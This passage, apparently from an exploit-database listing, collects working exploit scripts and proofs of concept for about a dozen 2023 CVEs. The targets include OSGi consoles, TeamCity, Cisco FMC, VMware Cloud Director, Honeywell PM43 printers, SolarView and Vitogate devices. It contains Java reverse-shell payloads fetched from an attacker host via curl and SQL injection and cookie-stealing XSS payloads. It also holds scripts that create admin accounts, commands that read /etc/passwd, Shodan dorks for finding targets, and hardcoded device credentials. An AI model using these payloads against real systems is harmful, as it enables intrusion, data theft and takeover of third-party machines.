Content-Type in the response header. Status Code:", response.status_code) else: print("The target does not appear to be vulnerable to CVE-2023-35813.") if __name__ == "__main__": console.print("[bold green]Author: Abhishek Morla[/bold green]") console.print("[bold red]CVE-2023-35813[/bold red]") parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore') parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance') args = parser.parse_args() main(args.hostname)
Human Resource Management System 1.0 - 'employeeid' SQL Injection
# Exploit Title: Human Resource Management System - SQL Injection # Date: 13-01-2024 # Exploit Author: Srikar ( Exp1o1t9r ) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 # Vulnerable URL and Parameter:URL: Parameter: employeeid=2 The following payloads successfully identified SQL injection vulnerabilities: employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT 6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT 7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION ALL SELECT NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - * # Response:MySQL: 10.4.32-MariaDB Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*
OSGi v3.8-3.18 Console - RCE
#!/usr/bin/python # Exploit Title: [OSGi v3.8-3.18 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.8 - 3.18] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ # --lport=4444 """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.8-3.18 and earlier. """ import argparse import socket import sys import threading from functools import partial from http.server import BaseHTTPRequestHandler, HTTPServer # Stage 1 of the handshake message HANDSHAKE_STAGE_1 = \ b"\xff\xfd\x01\xff\xfd" \ b"\x03\xff\xfb\x1f\xff" \ b"\xfa\x1f\x00\x74\x00" \ b"\x37\xff\xf0\xff\xfb" \ b"\x18" # Stage 2 of the handshake message HANDSHAKE_STAGE_2 = \ b"\xff\xfa\x18\x00\x58" \ b"\x54\x45\x52\x4d\x2d" \ b"\x32\x35\x36\x43\x4f" \ b"\x4c\x4f\x52\xff\xf0" # The buffer of this size is enough to handle the telnet handshake BUFFER_SIZE = 2 * 1024 class HandlerClass(BaseHTTPRequestHandler): """ This class overrides the BaseHTTPRequestHandler. It provides a specific functionality used to deliver a payload to the target host. """ _lhost: str _lport: int def __init__(self, lhost, lport, *args, **kwargs): self._lhost = lhost self._lport = lport super().__init__(*args, **kwargs) def _set_response(self): self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() def do_GET(self): # pylint: disable=C0103 """ This method is responsible for the playload delivery. 
""" print("Delivering the payload...") self._set_response() self.wfile.write(generate_revshell_payload( self._lhost, self._lport).encode('utf-8')) raise KeyboardInterrupt def log_message(self, format, *args): # pylint: disable=W0622 """ This method redefines a built-in method to suppress BaseHTTPRequestHandler log messages. """ return def generate_revshell_payload(lhost, lport): """ This function generates the Revershe Shell payload that will be executed on the target host. """ payload = \ "import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;" \ "class RevShell {public static void main(String[] args) " \ "throws Exception { String host=\"%s\";int port=%d;" \ "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \ "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \ "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \ "si=s.getInputStream();OutputStream po=p.getOutputStream()," \ "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \ ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \ "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \ "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \ "p.destroy();s.close();}}\n" % ( lhost, lport) return payload def run_payload_delivery(lhost, lport): """ This function is responsible for payload delivery. """ print("Setting up the HTTP server for payload delivery...") handler_class = partial(HandlerClass, lhost, lport) server_address = ('', 80) httpd = HTTPServer(server_address, handler_class) try: print("[+] HTTP server is running.") httpd.serve_forever() except KeyboardInterrupt: print("[+] Payload delivered.") except Exception as err: # pylint: disable=broad-except print("[-] Failed payload delivery!") print(err) finally: httpd.server_close() def generate_stage_1(lhost): """ This function generates the stage 1 of the payload. 
""" stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % ( lhost.encode() ) return stage_1 def generate_stage_2(): """ This function generates the stage 2 of the payload. """ stage_2 = b"fork \"java ./RevShell.java\"\n" return stage_2 def establish_connection(rhost, rport): """ This function creates a socket and establishes the connection to the target host. """ print("[*] Connecting to OSGi Console...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) print("[+] Connected.") return sock def process_handshake(sock): """ This function process the handshake with the target host. """ print("[*] Processing the handshake...") sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_1) sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def deliver_payload(sock, lhost): """ This function executes the first stage of the exploitation. It triggers the payload delivery mechanism to the target host. """ stage_1 = generate_stage_1(lhost) print("[*] Triggering the payload delivery...") sock.send(stage_1) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def execute_payload(sock): """ This function executes the second stage of the exploitation. It sends payload which is responsible for code execution. """ stage_2 = generate_stage_2() print("[*] Executing the payload...") sock.send(stage_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) print("[+] Payload executed.") def exploit(args, thread): """ This function sends the multistaged payload to the tareget host. """ try: sock = establish_connection(args.rhost, args.rport) process_handshake(sock) deliver_payload(sock, args.lhost) # Join the thread running the HTTP server # and wait for payload delivery thread.join() execute_payload(sock) sock.close() print("[+] Done.") except socket.error as err: print("[-] Could not connect!") print(err) sys.exit() def parse(): """ This fnction is used to parse and return command-line arguments. 
""" parser = argparse.ArgumentParser( prog="OSGi-3.8-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in versions between 3.8 and 3.18.", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def main(args): """ Main fuction. """ thread = threading.Thread( target=run_payload_delivery, args=(args.lhost, args.lport)) thread.start() exploit(args, thread) if __name__ == "__main__": main(parse())
Client Details System 1.0 - SQL Injection
+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137 ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137 ## Description: Client Details System 1.0 allows SQL Injection via the 'uemail' parameter in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit other vulnerabilities in the underlying database. ## Proof of Concept: + Go to the User Login page: "http://localhost/clientdetails/" + Fill in the email and password. + Intercept the request via Burp Suite and send it to Repeater. + Copy and paste the request into an "r.txt" file. + Captured Burp request: ``` POST /clientdetails/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 317 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/clientdetails/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 [email protected]&login=LOG+IN&password=P@ass123 ``` + Use sqlmap to exploit. In sqlmap, use the 'uemail' parameter to dump the database. 
``` python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db ``` ``` --- Parameter: uemail (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: [email protected]' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: [email protected]' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 --- [14:58:11] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.53, PHP, PHP 8.1.6 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:58:11] [INFO] fetching current database current database: 'loginsystem' ``` + current database: `loginsystem` 
OSGi v3.7.2 (and below) Console - RCE
#!/usr/bin/python # Exploit Title: [OSGi v3.7.2 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.7.2 and before] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Examples: # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ # --lport=4444 # # python exploit.py --rhost=localhost --rport=1337 --payload= \ # "curl http://192.168.100.100/osgi_test" """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.7.2 and earlier. """ import argparse import base64 import socket def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.7.2-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in version 3.7.2 (or before).", epilog="Happy Hacking! 
:)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--payload", dest="custom_payload", help="custom payload", type=str, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") args = parser.parse_args() if args.custom_payload and (args.lhost or args.lport): parser.error( "either --payload or both --lport and --rport are required.") return args def generate_payload(lhost, lport, custom_payload): """ This function generates the whole payload ready for the delivery. """ payload = "" if custom_payload: payload = custom_payload print("(*) Using custom payload.") elif lhost and lport: payload = \ "echo 'import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;class Rev" \ "Shell {public static void main(String[] args) throws Excepti" \ "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \ "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \ ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \ "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \ "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \ ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \ "e(pe.available()>0)so.write(pe.read());while(si.available()>" \ "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \ ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \ ");s.close();}}' > RevShell.java ; java ./RevShell.java" % ( lhost, lport) print("(+) Using Java reverse shell payload.") bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % ( base64.b64encode(payload.encode())) wrapped_payload = b"fork 
\"%s\"\n" % (bash_payload) return wrapped_payload def deliver_payload(rhost, rport, payload): """ This function connects to the target host and delivers the payload. It returns True if successful; False otherwise. """ print("(*) Sending payload...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) sock.send(payload) sock.close() except socket.error as err: print(f"(-) Could not deliver the payload to {rhost}:{rport}!") print(err) return False return True def main(args): """ Main function. """ payload = generate_payload(args.lhost, args.lport, args.custom_payload) success = deliver_payload(args.rhost, args.rport, payload) if success: print("(+) Done.") else: print("(-) Finished with errors.") if __name__ == "__main__": main(parse())
Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE
# Exploit Title: [Cisco Firepower Management Center] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] # CVE : [CVE-2023-20048] import requests import json # set the variables for the URL, username, and password for the FMC web services interface fmc_url = "https://fmc.example.com" fmc_user = "admin" fmc_pass = "cisco123" # create a requests session to handle cookies and certificate verification session = requests.Session() session.verify = False # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken" response = session.post(token_url, auth=(fmc_user, fmc_pass)) # check the response status and extract the access token and refresh token from the response headers # set the access token as the authorization header for the subsequent requests try: if response.status_code == 200: access_token = response.headers["X-auth-access-token"] refresh_token = response.headers["X-auth-refresh-token"] session.headers["Authorization"] = access_token else: print("Failed to get tokens, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # set the variable for the domain id # change this to your domain id domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f" # send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords" response = session.get(devices_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get devices, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # parse the data to get the list of device names 
and URLs devices = [] for item in data["items"]: device_name = item["name"] device_url = item["links"]["self"] devices.append((device_name, device_url)) # loop through the list of devices and send a GET request to the URL of each device to get the device details for device in devices: device_name, device_url = device response = session.get(device_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get device details, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the device type, software version, and configuration URL device_type = data["type"] device_version = data["metadata"]["softwareVersion"] config_url = data["metadata"]["configURL"] # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability # use the values from the affected products section in the security advisory if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]: print("Device " + device_name + " is vulnerable to CVE-2023-20048") # create a list of commands that you want to execute on the device commands = ["show version", "show running-config", "show interfaces"] device_id = device_url.split("/")[-1] # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute for command in commands: command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command response = session.post(command_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = 
response.json() else: print("Failed to execute command, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the result of the command execution and print it result = data["result"] print("Command: " + command) print("Result: " + result) else: print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
VMware Cloud Director 10.5 - Bypass identity verification
# Exploit Title: [VMware Cloud Director | Bypass identity verification] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [10.5] # CVE : [CVE-2023-34060] import requests import paramiko import subprocess import socket import argparse import threading # Define a function to check if a port is open def is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: # The port is closed return False finally: # Close the socket s.close() # Define a function to exploit a vulnerable device def exploit_device(ip, port, username, password, command): # Create a ssh client object client = paramiko.SSHClient() # Set the policy to accept any host key client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Connect to the target using the credentials client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) # Execute the command and get the output stdin, stdout, stderr = client.exec_command(command) # Print the output print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") # Close the ssh connection client.close() # Parse the arguments from the user parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director") parser.add_argument("ip", help="The target IP address") parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check") parser.add_argument("-u", "--username", default="root", help="The username for ssh") parser.add_argument("-w", "--password", default="vmware", help="The password for ssh") parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices") args = 
parser.parse_args() # Loop through the ports and check for the vulnerability for port in args.ports: # Check if the port is open if is_port_open(args.ip, port): # The port is open, send a GET request to the port and check the status code response = requests.get(f"http://{args.ip}:{port}") if response.status_code == 200: # The port is open and vulnerable print(f"Port {port} is vulnerable to CVE-2023-34060") # Create a thread to exploit the device thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) # Start the thread thread.start() else: # The port is open but not vulnerable print(f"Port {port} is not vulnerable to CVE-2023-34060") else: # The port is closed print(f"Port {port} is closed")
SnipeIT 6.2.1 - Stored Cross Site Scripting
Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting Date: 06-Oct-2023 Exploit Author: Shahzaib Ali Khan Vendor Homepage: https://snipeitapp.com Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 Version: 6.2.1 Tested on: Windows 11 22H2 and Ubuntu 20.04 CVE: CVE-2023-5452 Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting (XSS) vulnerability that allows attackers to execute JavaScript in other users' browsers. The location endpoint was vulnerable. Steps to Reproduce: 1. Login as a standard user [non-admin] > Asset page > List All 2. Click to open any asset > Edit Asset 3. Create a new location and add the payload: <script>alert(document.cookie)</script> 4. Now login as any other non-admin or admin user > Asset page > List All 5. Open the same asset whose location you changed and the payload will get executed. POC Request: POST /api/v1/locations HTTP/1.1 Host: localhost Content-Length: 118 Accept: */* X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Referer: http://localhost/hardware/196/edit Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO; assetsListingTable.bs.table.cardView=false; laravel_token= eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3 ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0 
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D; XSRF-TOKEN= eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5 MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D Connection: close name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country= Thanks, Shahzaib Ali Khan
JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)
#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) #- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648 #- Exploit Author: ByteHunter #- Vendor: JetBrains #- Email: [email protected] #- vendor: JetBrains #- Version: versions before 2023.05.4 #- Tested on: 2023.05.3 #- CVE : CVE-2023-42793 import requests import argparse import re import random import string import subprocess banner = """ ===================================================== * CVE-2023-42793 * * TeamCity Admin Account Creation * * * * Author: ByteHunter * ===================================================== """ print(banner) parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC") parser.add_argument("-u", "--url", required=True, help="Target URL") parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode") args = parser.parse_args() url = args.url if url.startswith("https://"): curl_command = "curl -k" else: curl_command = "curl" get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" create_user_url = f"{url}/app/rest/users" create_user_command = "" token = "" response = requests.post(get_token_url, verify=False) if response.status_code == 200: match = re.search(r'value="([^"]+)"', response.text) if match: token = match.group(1) print(f"Token: {token}") else: print("Token not found in the response") elif response.status_code == 404: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") elif response.status_code == 400: print("Token already 
exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") else: print("Failed to get a token") if token: headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4)) username = f"city_admin{random_chars}" data = { "username": username, "password": "Main_password!!**", "email": "[email protected]", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]} } create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\'' create_user_response = requests.post(create_user_url, headers=headers, json=data) if create_user_response.status_code == 200: print("Successfully exploited!") print(f"URL: {url}") print(f"Username: {username}") print("Password: Main_password!!**") else: print("Failed to create new admin user") if args.verbose: if response.status_code == 400: pass else: print(f"Final curl command: {create_user_command}")
Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) #- Shodan Dork: http.title:PM43 , PM43 #- Exploit Author: ByteHunter #- Email: [email protected] #- Frimware Version: versions prior to P10.19.050004 #- Tested on: P10.17.019667 #- CVE : CVE-2023-3710 import requests import argparse BLUE = '\033[94m' YELLOW = '\033[93m' RESET = '\033[0m' def banner(): banner = """ ╔════════════════════════════════════════════════╗ CVE-2023-3710 Command Injection in Honeywell PM43 Printers Author: ByteHunter ╚════════════════════════════════════════════════╝ """ print(YELLOW + banner + RESET) def run_command(url, command): full_url = f"{url}/loadfile.lp?pageid=Configure" payload = { 'username': f'hunt\n{command}\n', 'userpassword': 'admin12345admin!!' } try: response = requests.post(full_url, data=payload, verify=False) response_text = response.text html_start_index = response_text.find('<html>') if html_start_index != -1: return response_text[:html_start_index] else: return response_text except requests.exceptions.RequestException as e: return f"Error: {e}" def main(): parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers') parser.add_argument('--url', dest='url', help='Target URL', required=True) parser.add_argument('--run', dest='command', help='Command to execute', required=True) args = parser.parse_args() response = run_command(args.url, args.command) print(f"{BLUE}{response}{RESET}") if __name__ == "__main__": banner() main()
SolarView Compact 6.00 - Command Injection
#- Exploit Title: SolarView Compact 6.00 - Command Injection #- Shodan Dork: http.html:"solarview compact" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: 6.00 #- Tested on: 6.00 #- CVE : CVE-2023-23333 import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}") else: print("No vulnerability detected.") else: print("Error: Unable to fetch response.") def main(): parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ") parser.add_argument("-i", "--ip", help="IP address of the target device", required=True) parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int) args = parser.parse_args() ip_address = args.ip port = args.port vuln_check(ip_address, port) if __name__ == "__main__": main()
Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)
#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE) #- Shodan Dork: http.title:'Vitogate 300' #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: versions up to 2.1.3.0 #- Tested on: 2.1.1.0 #- CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import requests def banner(): banner = """ ╔═══════════════════════════════════╗ CVE-2023-5702 Vitogate 300 RCE Author: ByteHunter ╚═══════════════════════════════════╝ """ print(banner) def send_post_request(target_ip, command, target_port): payload = { "method": "put", "form": "form-4-7", "session": "", "params": { "ipaddr": f"1;{command}" } } headers = { "Host": target_ip, "Content-Length": str(len(str(payload))), "Content-Type": "application/json" } url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi" response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("Result:") print(response.text) else: print(f"Request failed! status code: {response.status_code}") def main(): parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials") parser.add_argument("--target", required=False, help="Target IP address") parser.add_argument("--port", required=False, help="Target port",default="80") parser.add_argument("--command", required=False, help="Command") parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials") args = parser.parse_args() if args.creds: print("Vitogate 300 hardcoded administrative accounts credentials") print("Username: vitomaster, Password: viessmann1917") print("Username: vitogate, Password: viessmann") else: target_ip = args.target target_port = args.port command = args.command if not (target_ip and command): print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.") return send_post_request(target_ip, command,target_port) if __name__ == 